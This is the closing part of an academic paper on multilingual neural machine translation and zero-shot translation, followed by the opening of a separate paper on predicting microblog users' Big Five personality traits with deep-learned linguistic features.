-0.76 vs single - -5.6% -4.7% -3.1% -2.5% group languages with little loss in quality while hav- ing the benefits of better training efficiency, smaller number of models, and easier productionization. 4.6 Zero-Shot Translation The most straight-forward approach of translating between languages where no or little parallel data is available is to use explicit bridging, meaning to translate to an intermediate language first and then to translate to the desired target language. The in- termediate language is often English as xx→En and En→yy data is more readily available. The two po- tential disadvantages of this approach are: a) total translation time doubles, b) the potential loss of qual- ity by translating to/from the intermediate language. An interesting benefit of our approach is that it al- lows to perform directly implicit bridging (zero-shot translation) between a language pair for which no explicit parallel training data has been seen without any modification to the model. Obviously, the model will only be able to do zero-shot translation between languages it has seen individually as source and tar- get languages during training at some point, not for entirely new ones. To demonstrate this we will use two multilingual models — a model trained with examples from two different language pairs, Pt→En and En→Es (Model 1), and a model trained with examples from four dif- ferent language pairs, En↔Pt and En↔Es (Model 2). As with the previous multilingual models, both of these models perform comparable to or even slightly better than the baseline single models for the lan- guage pairs explicitly seen. Additionally, we show that both of these models can generate reasonable quality Pt→Es translations (BLEU scores above 20) without ever having seen Pt→Es data during training. To our knowledge this is the first successful demon- stration of true multilingual zero-shot translation. Table 5 summarizes our results for the Pt→Es translation experiments. Rows (a) and (b) show the performance of the phrase-based machine translation (PBMT) system and the NMT system through ex- plicit bridging (Pt→En, then En→Es). It can be seen that the NMT system outperforms the PBMT system by close to 2 BLEU points. For comparison, we also built a single NMT model on all available Pt→Es parallel sentences (see (c) in Table 5). Table 5: Portuguese→Spanish BLEU scores using various models. Model Zero-shot BLEU (a) PBMT bridged no 28.99 (b) NMT bridged no 30.91 (c) NMT Pt→Es no 31.50 (d) Model 1 (Pt→En, En→Es) yes 21.62 (e) Model 2 (En↔{Es, Pt}) yes 24.75 (f) Model 2 + incremental training no 31.77 The most interesting observation is that both Model 1 and Model 2 can perform zero-shot trans- lation with reasonable quality (see (d) and (e)) com- pared to the initial expectation that this would not work at all. Note that Model 2 outperforms Model 1 by close to 3 BLEU points although Model 2 was trained with four language pairs as opposed to with only two for Model 1 (with both models having the same number of total parameters). In this case the ad- dition of Spanish on the source side and Portuguese on the target side helps Pt→Es zero-shot translation (which is the opposite direction of where we would expect it to help). We believe that this unexpected effect is only possible because our shared architec- ture enables the model to learn a form of interlingua between all these languages. We explore this hypoth- esis in more detail in Section 5. Finally we incrementally train zero-shot Model 2 with a small amount of true Pt→Es parallel data (an order of magnitude less than Table 5 (c)) and obtain the best quality and half the decoding time compared 345 to explicit bridging (Table 5 (b)). The resulting model cannot be called zero-shot anymore since some true parallel data has been used to improve it. Overall this shows that the proposed approach of implicit bridging using zero-shot translation via multilingual models can serve as a good baseline for further in- cremental training with relatively small amounts of true parallel data of the zero-shot direction. This result is especially significant for non-English low- resource language pairs where it might be easier to obtain parallel data with English but much harder to obtain parallel data for language pairs where neither the source nor the target language is English. We explore the effect of using parallel data in more detail in Section 4.7. Since Portuguese and Spanish are of the same lan- guage family, an interesting question is how well zero-shot translation works for less related languages. Table 6 shows the results for explicit and implicit bridging from Spanish to Japanese using the large- scale model from Table 4 – Spanish and Japanese can be regarded as quite unrelated. As expected zero- shot translation works worse than explicit bridging and the quality drops relatively more (roughly 50% drop in BLEU score) than for the case of more re- lated languages as shown above. Despite the quality drop, this proves that our approach enables zero-shot translation even between unrelated languages. Table 6: Spanish→Japanese BLEU scores for explicit and implicit bridging using the 12-language pair large-scale model from Table 4. Model BLEU NMT Es→Ja explicitly bridged 18.00 NMT Es→Ja implicitly bridged 9.14 4.7 Effect of Direct Parallel Data In this section, we explore two ways of leveraging available parallel data to improve zero-shot transla- tion quality, similar in spirit to what was reported in Firat et al., (2016c). For our multilingual architecture we consider: • Incrementally training the multilingual model on the additional parallel data for the zero-shot directions. • Training a new multilingual model with all avail- able parallel data mixed equally. For our experiments, we use a baseline model which we call “Zero-Shot” trained on a combined parallel corpus of English↔{Belarusian(Be), Russian(Ru), Ukrainian(Uk)}. We trained a second model on the above corpus together with additional Ru↔{Be, Uk} data. We call this model “From-Scratch”. Both mod- els support four target languages, and are evaluated on our standard test sets. As done previously we oversample the data such that all language pairs are represented equally. Finally, we take the best check- point of the “Zero-Shot” model, and run incremental training on a small portion of the data used to train the “From-Scratch” model for a short period of time until convergence (in this case 3% of “Zero-Shot” model total training time). We call this model “Incre- mental”. As can be seen from Table 7, for the English↔X directions, all three models show comparable scores. On the Ru↔{Be, Uk} directions, the “Zero-Shot” model already achieves relatively high BLEU scores for all directions except one, without any explicit parallel data. This could be because these languages are linguistically related. In the “From-Scratch” col- umn, we see that training a new model from scratch improves the zero-shot translation directions further. However, this strategy has a slightly negative effect on the En↔X directions because our oversampling strategy will reduce the frequency of the data from these directions. In the final column, we see that in- cremental training with direct parallel data recovers most of the BLEU score difference between the first two columns on the zero-shot language pairs. In sum- mary, our shared architecture models the zero-shot language pairs quite well and hence enables us to easily improve their quality with a small amount of additional parallel data. 5 Visual Analysis The results of this paper — that training a model across multiple languages can enhance performance at the individual language level, and that zero-shot translation can be effective — raise a number of ques- tions about how these tasks are handled inside the model. Is the network learning some sort of shared representation, in which sentences with the same meaning are represented in similar ways regardless of language? Does the model operate on zero-shot 346 Table 7: BLEU scores for English↔{Belarusian, Russian, Ukrainian} models. Zero-Shot From-Scratch Incremental En→Be 16.85 17.03 16.99 En→Ru 22.21 22.03 21.92 En→Uk 18.16 17.75 18.27 Be→En 25.44 24.72 25.54 Ru→En 28.36 27.90 28.46 Uk→En 28.60 28.51 28.58 Be→Ru 56.53 82.50 78.63 Ru→Be 58.75 72.06 70.01 Ru→Uk 21.92 25.75 25.34 Uk→Ru 16.73 30.53 29.92 translations in the same way as it treats language pairs it has been trained on? One way to study the representations used by the network is to look at the activations of the network during translation. A starting point for investigation is the set of context vectors, i.e., the sum of internal encoder states weighted by their attention probabili- ties per step (Eq. (5) in (Bahdanau et al., 2015)). A translation of a single sentence generates a se- quence of context vectors. In this context, our orig- inal questions about shared representation can be studied by looking at how the vector sequences of different sentences relate. We could then ask for ex- ample: Do sentences cluster together depending on the source or target language? Or instead do sen- tences with similar meanings cluster, regardless of language? We try to find answers to these questions by looking at lower-dimensional representations of internal embeddings of the network that humans can more easily interpret. 5.1 Evidence for an Interlingua Several trained networks indeed show strong vi- sual evidence of a shared representation. For ex- ample, Figure 1 below was produced from a many- to-many model trained on four language pairs, English↔Japanese and English↔Korean. To visual- ize the model in action we began with a small corpus of 74 triples of semantically identical cross-language phrases. That is, each triple contained phrases in En- glish, Japanese and Korean with the same underlying meaning. To compile these triples, we searched a ground-truth database for English sentences which were paired with both Japanese and Korean transla- tions. We then applied the trained model to translate each sentence of each triple into the two other possible lan- guages. Performing this process yielded six new sen- tences based on each triple, for a total of 74∗6 = 444 total translations with 9,978 steps corresponding to the same number of context vectors. Since context vectors are high-dimensional, we use the TensorFlow Embedding Projector2 to map them into more acces- sible 3D space via t-SNE (Maaten and Hinton, 2008). In the following diagrams, each point represents a single decoding step during the translation process. Points that represent steps for a given sentence are connected by line segments. Figure 1 shows a global view of all 9,978 context vectors. Points produced from the same original sen- tence triple are all given the same (random) color. Inspection of these clusters shows that each strand represents a single sentence, and clusters of strands generally represent a set of translations of the same underlying sentence, but with different source and target languages. At right are two close-ups: one of an individual cluster, still coloring based on membership in the same triple, and one where we have colored by source language. 5.2 Partially Separated Representations Not all models show such clean semantic clustering. Sometimes we observed joint embeddings in some regions of space coexisting with separate large clus- ters which contained many context vectors from just one language pair. For example, Figure 2a shows a t-SNE projection of context vectors from a model that was trained on Portuguese→English (blue) and English→Spanish (yellow) and performing zero-shot translation from Portuguese→Spanish (red). This projection shows 153 semantically identical triples translated as de- scribed above, yielding 459 total translations. The large red region on the left primarily contains zero- shot Portuguese→Spanish translations. In other words, for a significant number of sentences, the zero-shot translation has a different embedding than the two trained translation directions. On the other hand, some zero-shot translation vectors do seem to 2https://www.tensorflow.org/get_started/ embedding_viz 347 Figure 1: A t-SNE projection of the embedding of 74 semantically identical sentences translated across all 6 possible directions, yielding a total of 9,978 steps (dots in the image), from the model trained on English↔Japanese and English↔Korean examples. (a) A bird’s-eye view of the embedding, coloring by the index of the semantic sentence. Well-defined clusters each having a single color are apparent. (b) A zoomed in view of one of the clusters with the same coloring. All of the sentences within this cluster are translations of “The stratosphere extends from about 10km to about 50km in altitude.” (c) The same cluster colored by source language. All three source languages can be seen within this cluster. Figure 2: (a) A bird’s-eye view of a t-SNE projection of an embedding of the model trained on Portuguese→English (blue) and English→Spanish (yellow) examples with a Portuguese→Spanish zero-shot bridge (red). The large red region on the left primarily contains the zero-shot Portuguese→Spanish translations. (b) A scatter plot of BLEU scores of zero-shot translations versus the average point-wise distance between the zero-shot translation and a non-bridged translation. The Pearson correlation coefficient is −0.42. 348 fall near the embeddings found in other languages, as on the large region on the right. It is natural to ask whether the large cluster of “sep- arated” zero-shot translations has any significance. A definitive answer requires further investigation, but in this case zero-shot translations in the separated area do tend to have lower BLEU scores. Figure 2b shows a plot of BLEU scores of a zero- shot translation versus the average pointwise distance between it and the same translation from a trained language pair. An interesting area for future research is to find a more reliable correspondence between em- bedding geometry and model performance to predict the quality of a zero-shot translation during decoding by comparing it to the embedding of the translation through a trained language pair. 6 Mixing Languages Having a mechanism to translate from a random source language to a single chosen target language using an additional source token made us think about what happens when languages are mixed on the source or target side. In particular, we were interested in the following two experiments: 1) Can a multilin- gual model successfully handle multi-language in- put (code-switching) in the middle of a sentence?; 2) What happens when a multilingual model is triggered with a linear mix of two target language tokens? 6.1 Source Language Code-Switching Here we show how multilingual models deal with source language code-switching – an example from a multilingual {Ja,Ko}→En model is below. Mixing Japanese and Korean in the source produces in many cases correct English translations, showing that code- switching can be handled by this model, although no such code-switching samples were present in the training data. Note that the model can effectively han- dle the different typographic scripts since the individ- ual characters/wordpieces are present in the shared vocabulary. • Japanese: 私は東京大学の学生です。→ I am a student at Tokyo University. • Korean: 나는도쿄대학의학생입니다. → I am a student at Tokyo University. • Japanese/Korean: 私は東京大学학생입니 다. → I am a student of Tokyo University. Interestingly, the mixed-language translation is slightly different from both single source language translations. 6.2 Weighted Target Language Selection Here we test what happens when we mix target lan- guages. Using a multilingual En→{Ja, Ko} model, we feed a linear combination (1−w)<2ja>+w<2ko> of the embedding vectors for “<2ja>” and “<2ko>”. Clearly, for w = 0 the model should produce Japanese, for w = 1 it should produce Korean, but what happens in between? The model may produce some sort of intermediate language (“Japarean”), but the results turn out to be less surprising. Most of the time the output just switches from one language to another around w = 0.5. In some cases, for intermediate values of w, the model switches languages mid-sentence. A possible explanation for this behavior is that the target language model, implicitly learned by the decoder LSTM, may make it very hard to mix words from different languages, especially when they use different scripts. Table 8 shows an example of mixed target lan- guages (Ja/Ko), where we can observe an interesting transition in the script and grammar. At wko = 0.58, the model translates the source sentence into a mix of Japanese and Korean. At wko = 0.60, the sen- tence is translated into full Korean, where all of the source words are captured, however, the ordering of the words is not natural. When wko is increased to 0.7, the model starts to translate the source sentence into a Korean sentence that sounds more natural.3 7 Conclusion We present a simple solution to multilingual NMT. We show that we can train multilingual NMT mod- els that can be used to translate between a number of different languages using a single model where all parameters are shared, which as a positive side- effect also improves the translation quality of low- resource languages in the mix. We also show that zero-shot translation without explicit bridging is pos- sible, which is the first time to our knowledge that a 3The Korean translation does not contain spaces and uses ‘。’ as punctuation symbol, and these are all artifacts of applying a Japanese postprocessor. 349 Table 8: Gradually mixing target languages Ja/Ko. wko I must be getting somewhere near the centre of the earth. 0.00 私は地球の中心の近くにどこかに行っているに違いない。 0.40 私は地球の中心近くのどこかに着いているに違いない。 0.56 私は地球の中心の近くのどこかになっているに違いない。 0.58 私は지구の中心의가까이에어딘가에도착하고있 어야한다。 0.60 나는지구의센터의가까이에어딘가에도착하고있 어야한다。 0.70 나는지구의중심근처어딘가에도착해야합니다。 0.90 나는어딘가지구의중심근처에도착해야합니다。 1.00 나는어딘가지구의중심근처에도착해야합니다。 form of true transfer learning has been shown to work for machine translation. To explicitly improve the zero-shot translation quality, we explore two ways of adding available parallel data and find that small additional amounts are sufficient to reach satisfac- tory results. In our largest experiment we merge 12 language pairs into a single model and achieve only slightly lower translation quality as for the sin- gle language pair baselines despite the drastically reduced amount of modeling capacity per language in the multilingual model. Visual interpretation of the results shows that these models learn a form of inter- lingua representation between all involved language pairs. The simple architecture makes it possible to mix languages on the source or target side to yield some interesting translation examples. Our approach has been shown to work reliably in a Google-scale production setting and enables us to scale to a large number of languages quickly. Acknowledgements We would like to thank the entire Google Brain Team and Google Translate Team for their foundational contributions to this project. In particular, we thank Junyoung Chung for his insights on the topic and Alex Rudnick and Otavio Good for helpful sugges- tions. We would also like to thank the TACL Action Editor and the reviewers for their feedback. References Martin Abadi and Paul Barham et al. 2016. Tensorflow: A system for large-scale machine learning. In 12th USENIX Symposium on Operating Systems Design and Implementation (OSDI 16), pages 265–283. Dzmitry Bahdanau, Kyunghyun Cho, and Yoshua Bengio. 2015. Neural machine translation by jointly learning to align and translate. In International Conference on Learning Representations. Ozan Caglayan and Walid Aransa et al. 2016. Does mul- timodality help human and machine for translation and image captioning? In Proceedings of the First Confer- ence on Machine Translation, pages 627–633, Berlin, Germany, August. Association for Computational Lin- guistics. Rich Caruana. 1998. Multitask learning. In Learning to learn, pages 95–133. Springer. Kyunghyun Cho, Bart van Merrienboer, Çaglar Gülçehre, Fethi Bougares, Holger Schwenk, and Yoshua Ben- gio. 2014. Learning phrase representations using RNN encoder-decoder for statistical machine translation. In Conference on Empirical Methods in Natural Language Processing. Josep Crego and Jungi Kim et al. 2016. Systran’s pure neural machine translation systems. arXiv preprint arXiv:1610.05540. Daxiang Dong, Hua Wu, Wei He, Dianhai Yu, and Haifeng Wang. 2015. Multi-task learning for multiple language translation. In Proceedings of the 53rd Annual Meeting of the Association for Computational Linguistics, pages 1723–1732. Orhan Firat, Kyunghyun Cho, and Yoshua Bengio. 2016a. Multi-way, multilingual neural machine translation with a shared attention mechanism. In The 2016 Con- ference of the North American Chapter of the Associa- tion for Computational Linguistics: Human Language Technologies, San Diego California, USA, June 12-17, 2016, pages 866–875. Orhan Firat, Kyunghyun Cho, Baskaran Sankaran, Fatos T. Yarman Vural, and Yoshua Bengio. 2016b. Multi-way, multilingual neural machine translation. Computer Speech and Language. Orhan Firat, Baskaran Sankaran, Yaser Al-Onaizan, Fatos T. Yarman Vural, and Kyunghyun Cho. 2016c. Zero-resource translation with multi-lingual neural ma- chine translation. In Proceedings of the 2016 Con- ference on Empirical Methods in Natural Language Processing, pages 268–277, Austin, Texas, November. Association for Computational Linguistics. Robert M French. 1999. Catastrophic forgetting in connectionist networks. Trends in cognitive sciences, 3(4):128–135. 350 Philip Gage. 1994. A new algorithm for data compression. C Users Journal, 12(2):23–38, February. Dan Gillick, Cliff Brunk, Oriol Vinyals, and Amarnag Sub- ramanya. 2016. Multilingual language processing from bytes. In Proceedings of the 2016 Conference of the North American Chapter of the Association for Compu- tational Linguistics: Human Language Technologies, pages 1296–1306, San Diego, California, June. Associ- ation for Computational Linguistics. William John Hutchins and Harold L. Somers. 1992. An introduction to machine translation, volume 362. Academic Press London. Nal Kalchbrenner and Phil Blunsom. 2013. Recurrent continuous translation models. In Conference on Em- pirical Methods in Natural Language Processing. Jason Lee, Kyunghyun Cho, and Thomas Hofmann. 2016. Fully character-level neural machine transla- tion without explicit segmentation. arXiv preprint arXiv:1610.03017. Minh-Thang Luong, Quoc V Le, Ilya Sutskever, Oriol Vinyals, and Lukasz Kaiser. 2015a. Multi-task se- quence to sequence learning. In International Confer- ence on Learning Representations. Minh-Thang Luong, Hieu Pham, and Christopher D. Man- ning. 2015b. Effective approaches to attention-based neural machine translation. In Conference on Empiri- cal Methods in Natural Language Processing. Minh-Thang Luong, Ilya Sutskever, Quoc V Le, Oriol Vinyals, and Wojciech Zaremba. 2015c. Addressing the rare word problem in neural machine translation. In Proceedings of the 53rd Annual Meeting of the As- sociation for Computational Linguistics and the 7th International Joint Conference on Natural Language Processing. Laurens Van Der Maaten and Geoffrey Hinton. 2008. Visualizing Data using t-SNE. Journal of Machine Learning Research, 9. Richard H Richens. 1958. Interlingual machine transla- tion. The Computer Journal, 1(3):144–147. Tanja Schultz and Katrin Kirchhoff. 2006. Multilingual speech processing. Elsevier Academic Press, Amster- dam, Boston, Paris. Mike Schuster and Kaisuke Nakajima. 2012. Japanese and Korean voice search. 2012 IEEE International Conference on Acoustics, Speech and Signal Process- ing. Jean Sébastien, Cho Kyunghyun, Roland Memisevic, and Yoshua Bengio. 2015. On using very large target vo- cabulary for neural machine translation. In Proceedings of the 53rd Annual Meeting of the Association for Com- putational Linguistics and the 7th International Joint Conference on Natural Language Processing. Rico Sennrich, Barry Haddow, and Alexandra Birch. 2016a. Controlling politeness in neural machine trans- lation via side constraints. In The 2016 Conference of the North American Chapter of the Association for Computational Linguistics: Human Language Tech- nologies, San Diego California, USA, June 12-17, 2016, pages 35–40. Rico Sennrich, Barry Haddow, and Alexandra Birch. 2016b. Neural machine translation of rare words with subword units. In Proceedings of the 54th Annual Meet- ing of the Association for Computational Linguistics. Ilya Sutskever, Oriol Vinyals, and Quoc V. Le. 2014. Sequence to sequence learning with neural networks. In Advances in Neural Information Processing Systems, pages 3104–3112. Yulia Tsvetkov, Sunayana Sitaram, Manaal Faruqui, Guillaume Lample, Patrick Littell, David Mortensen, Alan W Black, Lori Levin, and Chris Dyer. 2016. Poly- glot neural language models: A case study in cross- lingual phonetic representation learning. In Proceed- ings of the 2016 Conference of the North American Chapter of the Association for Computational Linguis- tics: Human Language Technologies, pages 1357–1366, San Diego, California, June. Association for Computa- tional Linguistics. Yonghui Wu, Mike Schuster, and Zhifeng Chen et al. 2016. Google’s neural machine translation system: Bridging the gap between human and machine translation. arXiv preprint arXiv:1609.08144v2. Hayahide Yamagishi, Shin Kanouchi, and Mamoru Ko- machi. 2016. Controlling the voice of a sentence in Japanese-to-English neural machine translation. In Proceedings of the 3rd Workshop on Asian Translation, pages 203–210, Osaka, Japan, December. Jie Zhou, Ying Cao, Xuguang Wang, Peng Li, and Wei Xu. 2016. Deep recurrent models with fast-forward connections for neural machine translation. Transac- tions of the Association for Computational Linguistics, 4:371–383. Barret Zoph and Kevin Knight. 2016. Multi-source neural translation. In NAACL HLT 2016, The 2016 Confer- ence of the North American Chapter of the Association for Computational Linguistics: Human Language Tech- nologies, San Diego California, USA, June 12-17, 2016, pages 30–34. 351 352 work_shio3as3kbbcpkmwhnofspvq6q ---- Submitted 30 March 2016 Accepted 10 August 2016 Published 19 September 2016 Corresponding authors Xiaoqian Liu, liuxiao- qian@psych.ac.cn Tingshao Zhu, tszhu@psych.ac.cn Academic editor Jinde Cao Additional Information and Declarations can be found on page 13 DOI 10.7717/peerj-cs.81 Copyright 2016 Liu and Zhu Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS Deep learning for constructing microblog behavior representation to identify social media user’s personality Xiaoqian Liu and Tingshao Zhu Institute of Psychology, Chinese Academy of Sciences, Beijing, China ABSTRACT Due to the rapid development of information technology, the Internet has gradually become a part of everyday life. People would like to communicate with friends to share their opinions on social networks. The diverse behavior on socials networks is an ideal reflection of users’ personality traits. Existing behavior analysis methods for personality prediction mostly extract behavior attributes with heuristic analysis. Although they work fairly well, they are hard to extend and maintain. In this paper, we utilize a deep learning algorithm to build a feature learning model for personality prediction, which could perform an unsupervised extraction of the Linguistic Representation Feature Vector (LRFV) activity without supervision from text actively published on the Sina microblog. Compared with other feature extractsion methods, LRFV, as an abstract representation of microblog content, could describe a user’s semantic information more objectively and comprehensively. In the experiments, the personality prediction model is built using a linear regression algorithm, and different attributes obtained through different feature extraction methods are taken as input of the prediction model, respectively. The results show that LRFV performs better in microblog behavior descriptions, and improves the performance of the personality prediction model. Subjects Artificial Intelligence, Natural Language and Speech, Social Computing Keywords Personality prediction, Social media behavior, Deep learning, Feature learning INTRODUCTION Personality can be defined as a set of traits in behaviour, cognition and emotion which is distinctive among people (Mischel, Shoda & Ayduk, 2007). In recent years, researchers have formed a consensus on personality structure, and proposed the Big Five factor model (Costa & McCrae, 1992), which uses five broad domains or factors to describe the human personality, including openness (O), conscientiousness (C), extraversion (E), agreeableness (A) and neuroticism (N) (Funder, 2001). Traditionally, questionnaires have been widely used for personality assessment, especially the Big Five personality questionnaire. But the form of questionnaire may be inefficient on large population. Due to the rapid development of information technology, the Internet has become part of everyday life. People prefer expressing their thoughts and interacting with friends on social network platforms. Therefore, researchers pay more and more attention to figuring out the correlation between the behavior of users on social networks and their personality traits in order to realize automatic personality prediction by machine learning methods. How to cite this article Liu and Zhu (2016), Deep learning for constructing microblog behavior representation to identify social media user’s personality. PeerJ Comput. Sci. 2:e81; DOI 10.7717/peerj-cs.81 https://peerj.com mailto:liuxiaoqian@psych.ac.cn mailto:liuxiaoqian@psych.ac.cn mailto:tszhu@psych.ac.cn https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.81 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://dx.doi.org/10.7717/peerj-cs.81 Nowadays, the Internet is not used just for communication, but also as a platform for users to express their thoughts, ideas and feelings. Personality is indirectly expressed by users’ behavior on the social network, which refers to a variety of operations on the social network, such as comment, follow and like. In addition, text, punctuation and emoticons published by users can be regarded as one kind of social behavior. Therefore, for automatic personality prediction, how to abstract these diverse and complex behaviors and acquire the digital representation of social network behaviors has become an critic problem. Existing behavior analysis methods are mostly based on some statistics rules, but artificial means have some disadvantages in objectivity and integrity. Generally, attributes are especially important for the performance of a prediction model. A set of proper feature vectors could improve the effectiveness of prediction model to a certain extent. Therefore, it is required that the attributes are not only the comprehensive and abstract description of individual’s behavior characteristic, but also reflect the diversity of different individuals’ behaviors. In this paper, we use a deep learning algorithm to perform an unsupervised extraction LRFV from users’ content published on the Sina microblog. Compared with other attributes obtained by artificially means, LRFV could represent users’ linguistic behavior more objectively and comprehensively. There are two reasons of utilizing deep learning algorithm to investigate the correlation between users’ linguistic behavior on social media and their personality traits. One is that deep learning algorithm could extract high-level abstract representation of data layer by layer by exploiting arithmetical operation and the architecture of model. It has been successfully applied in computer vision, object recognition and other research regions. Another is that the scale of social network data is huge, and the deep learning algorithm can meet the computational demands of big data. Given all this, in this article we have done a preliminary study on constructing microblog linguistic representation for personality prediction based on the deep learning algorithm. Related work At present, many researchers have paid attention to the correlation between users’ Internet behaviors and their personality traits. Qiu et al. (2012) investigated the relationship between tweets delivered on Twitter and users’ personality, and they found that some personality characteristics such as openness (O), extraversion (E) and agreeableness (A) are related to specific words used in tweets. Similarly, Vazire & Gosling (2004) discovered that there is great relevance between users’ specific Internet behaviors and their personality through studying users’ behaviors on personal websites. These conclusions can be explained as personality not only influencing people’s daily behaviors, but also playing an important role in users’ Internet behaviors. With the rise of social media, more and more researchers begin to analyse users’ personality traits through social network data with the help of computer technology. Sibel & Golbeck (2014) predicted users’ personality based on operational behaviors on Twitter utilizing linear regression model. Similarly, Golbeck et al. (2011) used regression algorithm to build a personality prediction model, but they considered both of operational behaviors and linguistic behaviors. Lima & De Castro (2013) used a semi- supervised method to predict personality based on the attributes of linguistic behaviors extracted from tweets. Ortigosa, Carro & Quiroga (2013) built a personality prediction Liu and Zhu (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.81 2/15 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.81 model of users according to their social interactions in Facebook by machine-learning methods, such as classification trees. Although many researchers utilized machine learning methods to built personality prediction models and have made some achievements, there are also some disadvantages for which improvements are needed. First, in state-of-art methods, the behavior analysis method and behavior attributes extraction methods are mostly based on some experiential heuristic rules which are set artificially. The behavior attributes extracted manually by statistical methods may not be able to comprehensively and objectively describe the characteristics of behaviors. Second, supervised and semi-supervised behavior feature extraction methods need a certain amount of labeled data, but obtaining a large number of labeled data is difficult, time-consuming and has a high cost. Therefore, supervised and semi-supervised feature extraction methods are not suitable for a wide range of application. Deep learning In recent years, there are more and more interdisciplinary research of computational science and psychology (Zhang et al., 2013; Chen et al., 2015). Deep learning is a set of algorithms in machine learning (Bengio, 2009; Bengio, Courville & Vincent, 2013), which owns a hierarchical structure in accordance with the biological characteristics of human brain. The deep learning algorithm originated in artificial neural networks, and has been applied successfully in many artificial intelligence applications, such as face recognition (Huang, Lee & Learned-miller, 2012), image classification (Ciresan, Meier & Schmidhuber, 2012), natural language processing (Socher et al., 2013) and so on. Recently, researchers are attempting to apply deep learning algorithms to other research fields. Huijie et al. (2014a) and Huijie et al. (2014b) used the Cross-media Auto-Encoder (CAE) to extract feature vectors, and identified users’ psychological stress based on social network data. Due to the multi-layer structure and mathematics algorithm design, deep learning algorithms can extract more abstract high-level representation from low-level feature through multiple non-linear transformations, and discover the distribution characteristics of data. In this paper, based on the deep learning algorithm, we could train unsupervised linguistic behavior feature learning models for five factors of personality. Through the feature learning models, the LRFV corresponding to each personality trait can be learned actively from users’ contents published on the Sina microblog. The LRFV could describe the users’ linguistic behavior more objectively and comprehensively, and improve the accuracy of the personality prediction model. DATASET In this paper, we utilize deep learning algorithm to construct an unsupervised feature learning model which can actively and objectively extract the Linguistic Representation Feature Vector (LRFV) from users’ content published on the Sina microblog. Next, five personality prediction models corresponding to five personality traits are built using a linear regression algorithm based on LRFV. We conducted preliminary experiments on relatively small data as pre-study of exploring the feasibility of using deep learning algorithm to investigate the correlation between a user’s social network behavior and personality. Liu and Zhu (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.81 3/15 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.81 Data collection Nowadays, users prefer expressing their attitudes and feelings through social network. Therefore, the linguistic information on social network is more significant for analysing users’ personality characteristics. In this paper, we pay more attention to the correlation between users’ linguistic behaviors on Sina microblog and their personalities. According to the latest statistics, by the end of Dec. 2014, the total number of registered users of Sina microblog has exceeded 500 million. On the 2015 spring festival’s eve, the number of daily active users was more than one billion. It can be said that the Sina microblog is currently one of the most popular social network platforms in China. Similarly to Facebook and Twitter, Sina microblog users can post blogs to share what they saw and heard. Through the Sina microblog, people express their inner thoughts and ideas, follow friends or someone they want to pay attention to, and comment or repost blogs that interest them or on which they agree. For data collection, we firstly released the experiment recruitment information on Sina microblog. Based on the assumption that the users are often express themselves on social media platform, we try to construct personality prediction model. So, it is required that for one person, there have to be enough Sina microblog data. On the other hand, some participants might provide their deprecated or deputy accounts of social network rather than the commonly used and actual accounts when participating our experiment; such data are unfaithful. In consideration of this, we set an ‘‘active users’’ selection criteria for choosing the effective and authentic samples. Our human study has been reviewed and approved by the Institutional Review Board, and the protocol number is ‘‘H09036.’’ In totally, 2,385 volunteers were recruited to participate in our experiments. They have to finish the Big Five questionnaire (Vittorio et al., 1993) online and authorized us to obtain the public personal information and all blogs. Collecting volunteers’ IDs of Sina microblog, we obtained their microblog data through Sina microblog API. The microblog data collected consists of the users’ all blogs and their basic status information, such as age, gender, province, personal description and so on. The whole process of subjects recruitment and data collection lasted nearly two months. Through the preliminary screening, we obtained 1,552 valid samples finally. When filtering invalid and noisy data, we designed some heuristic rules as follows: • If the total number of one’s microblogs is more than 500, this volunteer is a valid sample. This rule can ensure that the volunteer is an active user. • In order to ensure the authenticity of the results of questionnaire, we set several polygraph questions in the questionnaire. The samples with unqualified questionnaires were removed. • When the volunteers filled out the questionnaire online, the time they took on each question were recorded. If the answering time was too short, the corresponding volunteer was considered as an invalid sample. In our experiments, we set that the answering time should be longer than 2 s. Liu and Zhu (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.81 4/15 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.81 Data for linguistic behavior feature learning Through iteration and calculation layer by layer, a deep learning algorithm can mine the internal connection and intrinsical characteristics of linguistic information on social network platforms. Assuming that the text in microblogs could reflect users’ personality characteristics, for each trait of personality, we build a linguistic behavior feature learning model based on the deep learning algorithm to extract the corresponding LRFV from users’ expressions in the Sina microblog. Linguistic Inquiry and Word Count (LIWC) is a kind of language statistical analysis software, which has been widely used by many researchers to extract attributes of English contents from Twitter and Facebook (Golbeck et al., 2011; Golbeck, Robles & Turner, 2011). In order to meet the demands of simple Chinese semantic analysis, we developed a simplified Chinese psychological linguistic analysis dictionary for the Sina microblog (SCLIWC) (Gao et al., 2013). This dictionary was built based on LIWC 2007 (Tausczik & Pennebaker, 2010) and the traditional Chinese version of LIWC (CLIWC) (Huang et al., 2012). Besides referring to the original LIWC, we added five thousand words which are most frequently used in the Sina microblog into this dictionary. The words in the dictionary are classified into 88 categories according to emotion and meaning, such as positive word, negative word, family, money, punctuation, etc. Through analysis and observation, we found that in some factors of personality, users of different scores show great differences in the number of used words belonging to positive emotion, negative emotion and some other categories in the dictionary. According to SCLIWC (Gao et al., 2013), the users’ usage degree of words in blogs could be computed in 88 categories. In order to obtain the usage characteristics of social media text in the temporal domain, we first divide the time by week. For the ith word category of SCLIWC, the usage frequency within the jth week f ij (i=1,2,...,88) is calculated by Eq. (1), in which, i denotes the serial number of category, and j denotes the serial number of week. We collect all the text published in Sina microblog during recent three years (Jun. 2012–Jun. 2015), and there are 156 weeks in total. Therefore, corresponding to each category of SCLIWC, the vector f i={f i1,f i 2,...,f i 156} is the digital representation of the ith category in temporal domain. f ij = The number of words belongs to the ith category of SCLIWC in jth week The total number of words in blogs in jth week . (1) Then, we utilize Fast Fourier Transform(FFT) (Loan, 1992) to obtain the varying characteristics of social media text usage in temporal space. Fourier Transform is a special integral transform, which could convert the original temporal signal into frequency domain signal which is easily analyzed. FFT is the fast algorithm of Discrete Fourier Transform (DFT), defined by X(k)=DFT[x(n)]= N−1∑ n=0 x(n)W knN , k=0,1,...,N −1 (2) WN =e −j 2πN . (3) Liu and Zhu (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.81 5/15 https://peerj.com 